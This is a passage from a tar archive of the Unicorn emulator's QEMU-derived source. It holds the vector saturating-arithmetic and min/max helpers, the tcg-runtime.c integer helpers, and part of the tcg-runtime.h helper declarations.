*(int32_t *)((char *)a + i); int32_t bi = *(int32_t *)((char *)b + i); int32_t di = ai + bi; if (((di ^ ai) &~ (ai ^ bi)) < 0) { /* Signed overflow. */ di = (di < 0 ? INT32_MAX : INT32_MIN); } *(int32_t *)((char *)d + i) = di; } clear_high(d, oprsz, desc); } void HELPER(gvec_ssadd64)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(int64_t)) { int64_t ai = *(int64_t *)((char *)a + i); int64_t bi = *(int64_t *)((char *)b + i); int64_t di = ai + bi; if (((di ^ ai) &~ (ai ^ bi)) < 0) { /* Signed overflow. */ di = (di < 0 ? INT64_MAX : INT64_MIN); } *(int64_t *)((char *)d + i) = di; } clear_high(d, oprsz, desc); } void HELPER(gvec_sssub8)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint8_t)) { int r = *(int8_t *)((char *)a + i) - *(int8_t *)((char *)b + i); if (r > INT8_MAX) { r = INT8_MAX; } else if (r < INT8_MIN) { r = INT8_MIN; } *(uint8_t *)((char *)d + i) = r; } clear_high(d, oprsz, desc); } void HELPER(gvec_sssub16)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(int16_t)) { int r = *(int16_t *)((char *)a + i) - *(int16_t *)((char *)b + i); if (r > INT16_MAX) { r = INT16_MAX; } else if (r < INT16_MIN) { r = INT16_MIN; } *(int16_t *)((char *)d + i) = r; } clear_high(d, oprsz, desc); } void HELPER(gvec_sssub32)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(int32_t)) { int32_t ai = *(int32_t *)((char *)a + i); int32_t bi = *(int32_t *)((char *)b + i); int32_t di = ai - bi; if (((di ^ ai) & (ai ^ bi)) < 0) { /* Signed overflow. */ di = (di < 0 ? INT32_MAX : INT32_MIN); } *(int32_t *)((char *)d + i) = di; } clear_high(d, oprsz, desc); } void HELPER(gvec_sssub64)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(int64_t)) { int64_t ai = *(int64_t *)((char *)a + i); int64_t bi = *(int64_t *)((char *)b + i); int64_t di = ai - bi; if (((di ^ ai) & (ai ^ bi)) < 0) { /* Signed overflow. */ di = (di < 0 ? INT64_MAX : INT64_MIN); } *(int64_t *)((char *)d + i) = di; } clear_high(d, oprsz, desc); } void HELPER(gvec_usadd8)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint8_t)) { unsigned r = *(uint8_t *)((char *)a + i) + *(uint8_t *)((char *)b + i); if (r > UINT8_MAX) { r = UINT8_MAX; } *(uint8_t *)((char *)d + i) = r; } clear_high(d, oprsz, desc); } void HELPER(gvec_usadd16)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint16_t)) { unsigned r = *(uint16_t *)((char *)a + i) + *(uint16_t *)((char *)b + i); if (r > UINT16_MAX) { r = UINT16_MAX; } *(uint16_t *)((char *)d + i) = r; } clear_high(d, oprsz, desc); } void HELPER(gvec_usadd32)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint32_t)) { uint32_t ai = *(uint32_t *)((char *)a + i); uint32_t bi = *(uint32_t *)((char *)b + i); uint32_t di = ai + bi; if (di < ai) { di = UINT32_MAX; } *(uint32_t *)((char *)d + i) = di; } clear_high(d, oprsz, desc); } void HELPER(gvec_usadd64)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint64_t)) { uint64_t ai = *(uint64_t *)((char *)a + i); uint64_t bi = *(uint64_t *)((char *)b + i); uint64_t di = ai + bi; if (di < ai) { di = UINT64_MAX; } *(uint64_t *)((char *)d + i) = di; } clear_high(d, oprsz, desc); } void HELPER(gvec_ussub8)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint8_t)) { int r = *(uint8_t *)((char *)a + i) - *(uint8_t *)((char *)b + i); if (r < 0) { r = 0; } *(uint8_t *)((char *)d + i) = r; } clear_high(d, oprsz, desc); } void HELPER(gvec_ussub16)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint16_t)) { int r = *(uint16_t *)((char *)a + i) - *(uint16_t *)((char *)b + i); if (r < 0) { r = 0; } *(uint16_t *)((char *)d + i) = r; } clear_high(d, oprsz, desc); } void HELPER(gvec_ussub32)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint32_t)) { uint32_t ai = *(uint32_t *)((char *)a + i); uint32_t bi = *(uint32_t *)((char *)b + i); uint32_t di = ai - bi; if (ai < bi) { di = 0; } *(uint32_t *)((char *)d + i) = di; } clear_high(d, oprsz, desc); } void HELPER(gvec_ussub64)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint64_t)) { uint64_t ai = *(uint64_t *)((char *)a + i); uint64_t bi = *(uint64_t *)((char *)b + i); uint64_t di = ai - bi; if (ai < bi) { di = 0; } *(uint64_t *)((char *)d + i) = di; } clear_high(d, oprsz, desc); } void HELPER(gvec_smin8)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(int8_t)) { int8_t aa = *(int8_t *)((char *)a + i); int8_t bb = *(int8_t *)((char *)b + i); int8_t dd = aa < bb ? aa : bb; *(int8_t *)((char *)d + i) = dd; } clear_high(d, oprsz, desc); } void HELPER(gvec_smin16)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(int16_t)) { int16_t aa = *(int16_t *)((char *)a + i); int16_t bb = *(int16_t *)((char *)b + i); int16_t dd = aa < bb ? aa : bb; *(int16_t *)((char *)d + i) = dd; } clear_high(d, oprsz, desc); } void HELPER(gvec_smin32)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(int32_t)) { int32_t aa = *(int32_t *)((char *)a + i); int32_t bb = *(int32_t *)((char *)b + i); int32_t dd = aa < bb ? aa : bb; *(int32_t *)((char *)d + i) = dd; } clear_high(d, oprsz, desc); } void HELPER(gvec_smin64)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(int64_t)) { int64_t aa = *(int64_t *)((char *)a + i); int64_t bb = *(int64_t *)((char *)b + i); int64_t dd = aa < bb ? aa : bb; *(int64_t *)((char *)d + i) = dd; } clear_high(d, oprsz, desc); } void HELPER(gvec_smax8)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(int8_t)) { int8_t aa = *(int8_t *)((char *)a + i); int8_t bb = *(int8_t *)((char *)b + i); int8_t dd = aa > bb ? aa : bb; *(int8_t *)((char *)d + i) = dd; } clear_high(d, oprsz, desc); } void HELPER(gvec_smax16)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(int16_t)) { int16_t aa = *(int16_t *)((char *)a + i); int16_t bb = *(int16_t *)((char *)b + i); int16_t dd = aa > bb ? aa : bb; *(int16_t *)((char *)d + i) = dd; } clear_high(d, oprsz, desc); } void HELPER(gvec_smax32)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(int32_t)) { int32_t aa = *(int32_t *)((char *)a + i); int32_t bb = *(int32_t *)((char *)b + i); int32_t dd = aa > bb ? aa : bb; *(int32_t *)((char *)d + i) = dd; } clear_high(d, oprsz, desc); } void HELPER(gvec_smax64)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(int64_t)) { int64_t aa = *(int64_t *)((char *)a + i); int64_t bb = *(int64_t *)((char *)b + i); int64_t dd = aa > bb ? aa : bb; *(int64_t *)((char *)d + i) = dd; } clear_high(d, oprsz, desc); } void HELPER(gvec_umin8)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint8_t)) { uint8_t aa = *(uint8_t *)((char *)a + i); uint8_t bb = *(uint8_t *)((char *)b + i); uint8_t dd = aa < bb ? aa : bb; *(uint8_t *)((char *)d + i) = dd; } clear_high(d, oprsz, desc); } void HELPER(gvec_umin16)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint16_t)) { uint16_t aa = *(uint16_t *)((char *)a + i); uint16_t bb = *(uint16_t *)((char *)b + i); uint16_t dd = aa < bb ? aa : bb; *(uint16_t *)((char *)d + i) = dd; } clear_high(d, oprsz, desc); } void HELPER(gvec_umin32)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint32_t)) { uint32_t aa = *(uint32_t *)((char *)a + i); uint32_t bb = *(uint32_t *)((char *)b + i); uint32_t dd = aa < bb ? aa : bb; *(uint32_t *)((char *)d + i) = dd; } clear_high(d, oprsz, desc); } void HELPER(gvec_umin64)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint64_t)) { uint64_t aa = *(uint64_t *)((char *)a + i); uint64_t bb = *(uint64_t *)((char *)b + i); uint64_t dd = aa < bb ? aa : bb; *(uint64_t *)((char *)d + i) = dd; } clear_high(d, oprsz, desc); } void HELPER(gvec_umax8)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint8_t)) { uint8_t aa = *(uint8_t *)((char *)a + i); uint8_t bb = *(uint8_t *)((char *)b + i); uint8_t dd = aa > bb ? aa : bb; *(uint8_t *)((char *)d + i) = dd; } clear_high(d, oprsz, desc); } void HELPER(gvec_umax16)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint16_t)) { uint16_t aa = *(uint16_t *)((char *)a + i); uint16_t bb = *(uint16_t *)((char *)b + i); uint16_t dd = aa > bb ? aa : bb; *(uint16_t *)((char *)d + i) = dd; } clear_high(d, oprsz, desc); } void HELPER(gvec_umax32)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint32_t)) { uint32_t aa = *(uint32_t *)((char *)a + i); uint32_t bb = *(uint32_t *)((char *)b + i); uint32_t dd = aa > bb ? aa : bb; *(uint32_t *)((char *)d + i) = dd; } clear_high(d, oprsz, desc); } void HELPER(gvec_umax64)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint64_t)) { uint64_t aa = *(uint64_t *)((char *)a + i); uint64_t bb = *(uint64_t *)((char *)b + i); uint64_t dd = aa > bb ? aa : bb; *(uint64_t *)((char *)d + i) = dd; } clear_high(d, oprsz, desc); } void HELPER(gvec_bitsel)(void *d, void *a, void *b, void *c, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint64_t)) { uint64_t aa = *(uint64_t *)((char *)a + i); uint64_t bb = *(uint64_t *)((char *)b + i); uint64_t cc = *(uint64_t *)((char *)c + i); *(uint64_t *)((char *)d + i) = (bb & aa) | (cc & ~aa); } clear_high(d, oprsz, desc); } ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/accel/tcg/tcg-runtime.c����������������������������������������������������������0000664�0000000�0000000�00000007301�14675241067�0020402�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Tiny Code Generator for QEMU * * Copyright (c) 2008 Fabrice Bellard * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ #include "qemu/osdep.h" #include "qemu/host-utils.h" #include "cpu.h" #include "exec/helper-proto.h" #include "exec/cpu_ldst.h" #include "exec/exec-all.h" #include "exec/tb-lookup.h" #include "tcg/tcg.h" #include <uc_priv.h> /* 32-bit helpers */ int32_t HELPER(div_i32)(int32_t arg1, int32_t arg2) { return arg1 / arg2; } int32_t HELPER(rem_i32)(int32_t arg1, int32_t arg2) { return arg1 % arg2; } uint32_t HELPER(divu_i32)(uint32_t arg1, uint32_t arg2) { return arg1 / arg2; } uint32_t HELPER(remu_i32)(uint32_t arg1, uint32_t arg2) { return arg1 % arg2; } /* 64-bit helpers */ uint64_t HELPER(shl_i64)(uint64_t arg1, uint64_t arg2) { return arg1 << arg2; } uint64_t HELPER(shr_i64)(uint64_t arg1, uint64_t arg2) { return arg1 >> arg2; } int64_t HELPER(sar_i64)(int64_t arg1, int64_t arg2) { return arg1 >> arg2; } int64_t HELPER(div_i64)(int64_t arg1, int64_t arg2) { return arg1 / arg2; } int64_t HELPER(rem_i64)(int64_t arg1, int64_t arg2) { return arg1 % arg2; } uint64_t HELPER(divu_i64)(uint64_t arg1, uint64_t arg2) { return arg1 / arg2; } uint64_t HELPER(remu_i64)(uint64_t arg1, uint64_t arg2) { return arg1 % arg2; } uint64_t HELPER(muluh_i64)(uint64_t arg1, uint64_t arg2) { uint64_t l, h; mulu64(&l, &h, arg1, arg2); return h; } int64_t HELPER(mulsh_i64)(int64_t arg1, int64_t arg2) { uint64_t l, h; muls64(&l, &h, arg1, arg2); return h; } uint32_t HELPER(clz_i32)(uint32_t arg, uint32_t zero_val) { return arg ? clz32(arg) : zero_val; } uint32_t HELPER(ctz_i32)(uint32_t arg, uint32_t zero_val) { return arg ? ctz32(arg) : zero_val; } uint64_t HELPER(clz_i64)(uint64_t arg, uint64_t zero_val) { return arg ? clz64(arg) : zero_val; } uint64_t HELPER(ctz_i64)(uint64_t arg, uint64_t zero_val) { return arg ? ctz64(arg) : zero_val; } uint32_t HELPER(clrsb_i32)(uint32_t arg) { return clrsb32(arg); } uint64_t HELPER(clrsb_i64)(uint64_t arg) { return clrsb64(arg); } uint32_t HELPER(ctpop_i32)(uint32_t arg) { return ctpop32(arg); } uint64_t HELPER(ctpop_i64)(uint64_t arg) { return ctpop64(arg); } void *HELPER(lookup_tb_ptr)(CPUArchState *env) { CPUState *cpu = env_cpu(env); TranslationBlock *tb; target_ulong cs_base, pc; uint32_t flags; struct uc_struct *uc = (struct uc_struct *)cpu->uc; tb = tb_lookup__cpu_state(cpu, &pc, &cs_base, &flags, curr_cflags()); if (tb == NULL) { return uc->tcg_ctx->code_gen_epilogue; } return tb->tc.ptr; } void HELPER(exit_atomic)(CPUArchState *env) { cpu_loop_exit_atomic(env_cpu(env), GETPC()); } �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/accel/tcg/tcg-runtime.h����������������������������������������������������������0000664�0000000�0000000�00000033427�14675241067�0020417�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������DEF_HELPER_FLAGS_2(div_i32, TCG_CALL_NO_RWG_SE, s32, s32, s32) DEF_HELPER_FLAGS_2(rem_i32, TCG_CALL_NO_RWG_SE, s32, s32, s32) DEF_HELPER_FLAGS_2(divu_i32, TCG_CALL_NO_RWG_SE, i32, i32, i32) DEF_HELPER_FLAGS_2(remu_i32, TCG_CALL_NO_RWG_SE, i32, i32, i32) DEF_HELPER_FLAGS_2(div_i64, TCG_CALL_NO_RWG_SE, s64, s64, s64) DEF_HELPER_FLAGS_2(rem_i64, TCG_CALL_NO_RWG_SE, s64, s64, s64) DEF_HELPER_FLAGS_2(divu_i64, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(remu_i64, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(shl_i64, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(shr_i64, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(sar_i64, TCG_CALL_NO_RWG_SE, s64, s64, s64) DEF_HELPER_FLAGS_2(mulsh_i64, TCG_CALL_NO_RWG_SE, s64, s64, s64) DEF_HELPER_FLAGS_2(muluh_i64, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(clz_i32, TCG_CALL_NO_RWG_SE, i32, i32, i32) DEF_HELPER_FLAGS_2(ctz_i32, TCG_CALL_NO_RWG_SE, i32, i32, i32) DEF_HELPER_FLAGS_2(clz_i64, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(ctz_i64, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_1(clrsb_i32, TCG_CALL_NO_RWG_SE, i32, i32) DEF_HELPER_FLAGS_1(clrsb_i64, TCG_CALL_NO_RWG_SE, i64, i64) DEF_HELPER_FLAGS_1(ctpop_i32, TCG_CALL_NO_RWG_SE, i32, i32) DEF_HELPER_FLAGS_1(ctpop_i64, TCG_CALL_NO_RWG_SE, i64, i64) DEF_HELPER_FLAGS_1(lookup_tb_ptr, TCG_CALL_NO_WG_SE, ptr, env) DEF_HELPER_FLAGS_1(exit_atomic, TCG_CALL_NO_WG, noreturn, env) DEF_HELPER_FLAGS_5(atomic_cmpxchgb, TCG_CALL_NO_WG, i32, env, tl, i32, i32, i32) DEF_HELPER_FLAGS_5(atomic_cmpxchgw_be, TCG_CALL_NO_WG, i32, env, tl, i32, i32, i32) DEF_HELPER_FLAGS_5(atomic_cmpxchgw_le, TCG_CALL_NO_WG, i32, env, tl, i32, i32, i32) DEF_HELPER_FLAGS_5(atomic_cmpxchgl_be, TCG_CALL_NO_WG, i32, env, tl, i32, i32, i32) DEF_HELPER_FLAGS_5(atomic_cmpxchgl_le, TCG_CALL_NO_WG, i32, env, tl, i32, i32, i32) #ifdef CONFIG_ATOMIC64 DEF_HELPER_FLAGS_5(atomic_cmpxchgq_be, TCG_CALL_NO_WG, i64, env, tl, i64, i64, i32) DEF_HELPER_FLAGS_5(atomic_cmpxchgq_le, TCG_CALL_NO_WG, i64, env, tl, i64, i64, i32) #endif #ifdef CONFIG_ATOMIC64 #define GEN_ATOMIC_HELPERS(NAME) \ DEF_HELPER_FLAGS_4(glue(glue(atomic_, NAME), b), \ TCG_CALL_NO_WG, i32, env, tl, i32, i32) \ DEF_HELPER_FLAGS_4(glue(glue(atomic_, NAME), w_le), \ TCG_CALL_NO_WG, i32, env, tl, i32, i32) \ DEF_HELPER_FLAGS_4(glue(glue(atomic_, NAME), w_be), \ TCG_CALL_NO_WG, i32, env, tl, i32, i32) \ DEF_HELPER_FLAGS_4(glue(glue(atomic_, NAME), l_le), \ TCG_CALL_NO_WG, i32, env, tl, i32, i32) \ DEF_HELPER_FLAGS_4(glue(glue(atomic_, NAME), l_be), \ TCG_CALL_NO_WG, i32, env, tl, i32, i32) \ DEF_HELPER_FLAGS_4(glue(glue(atomic_, NAME), q_le), \ TCG_CALL_NO_WG, i64, env, tl, i64, i32) \ DEF_HELPER_FLAGS_4(glue(glue(atomic_, NAME), q_be), \ TCG_CALL_NO_WG, i64, env, tl, i64, i32) #else #define GEN_ATOMIC_HELPERS(NAME) \ DEF_HELPER_FLAGS_4(glue(glue(atomic_, NAME), b), \ TCG_CALL_NO_WG, i32, env, tl, i32, i32) \ DEF_HELPER_FLAGS_4(glue(glue(atomic_, NAME), w_le), \ TCG_CALL_NO_WG, i32, env, tl, i32, i32) \ DEF_HELPER_FLAGS_4(glue(glue(atomic_, NAME), w_be), \ TCG_CALL_NO_WG, i32, env, tl, i32, i32) \ DEF_HELPER_FLAGS_4(glue(glue(atomic_, NAME), l_le), \ TCG_CALL_NO_WG, i32, env, tl, i32, i32) \ DEF_HELPER_FLAGS_4(glue(glue(atomic_, NAME), l_be), \ TCG_CALL_NO_WG, i32, env, tl, i32, i32) #endif /* CONFIG_ATOMIC64 */ GEN_ATOMIC_HELPERS(fetch_add) GEN_ATOMIC_HELPERS(fetch_and) GEN_ATOMIC_HELPERS(fetch_or) GEN_ATOMIC_HELPERS(fetch_xor) GEN_ATOMIC_HELPERS(fetch_smin) GEN_ATOMIC_HELPERS(fetch_umin) GEN_ATOMIC_HELPERS(fetch_smax) GEN_ATOMIC_HELPERS(fetch_umax) GEN_ATOMIC_HELPERS(add_fetch) GEN_ATOMIC_HELPERS(and_fetch) GEN_ATOMIC_HELPERS(or_fetch) GEN_ATOMIC_HELPERS(xor_fetch) GEN_ATOMIC_HELPERS(smin_fetch) GEN_ATOMIC_HELPERS(umin_fetch) GEN_ATOMIC_HELPERS(smax_fetch) GEN_ATOMIC_HELPERS(umax_fetch) GEN_ATOMIC_HELPERS(xchg) #undef GEN_ATOMIC_HELPERS DEF_HELPER_FLAGS_3(gvec_mov, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_3(gvec_dup8, TCG_CALL_NO_RWG, void, ptr, i32, i32) DEF_HELPER_FLAGS_3(gvec_dup16, TCG_CALL_NO_RWG, void, ptr, i32, i32) DEF_HELPER_FLAGS_3(gvec_dup32, TCG_CALL_NO_RWG, void, ptr, i32, i32) DEF_HELPER_FLAGS_3(gvec_dup64, TCG_CALL_NO_RWG, void, ptr, i32, i64) DEF_HELPER_FLAGS_4(gvec_add8, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_add16, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_add32, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_add64, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_adds8, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(gvec_adds16, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(gvec_adds32, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(gvec_adds64, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(gvec_sub8, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_sub16, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_sub32, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_sub64, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_subs8, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(gvec_subs16, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(gvec_subs32, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(gvec_subs64, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(gvec_mul8, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_mul16, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_mul32, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_mul64, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_muls8, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(gvec_muls16, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(gvec_muls32, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(gvec_muls64, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(gvec_ssadd8, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_ssadd16, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_ssadd32, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_ssadd64, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_sssub8, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_sssub16, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_sssub32, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_sssub64, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_usadd8, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_usadd16, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_usadd32, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_usadd64, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_ussub8, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_ussub16, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_ussub32, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_ussub64, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_smin8, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_smin16, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_smin32, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_smin64, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_smax8, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_smax16, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_smax32, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_smax64, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_umin8, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_umin16, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_umin32, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_umin64, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_umax8, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_umax16, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_umax32, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_umax64, 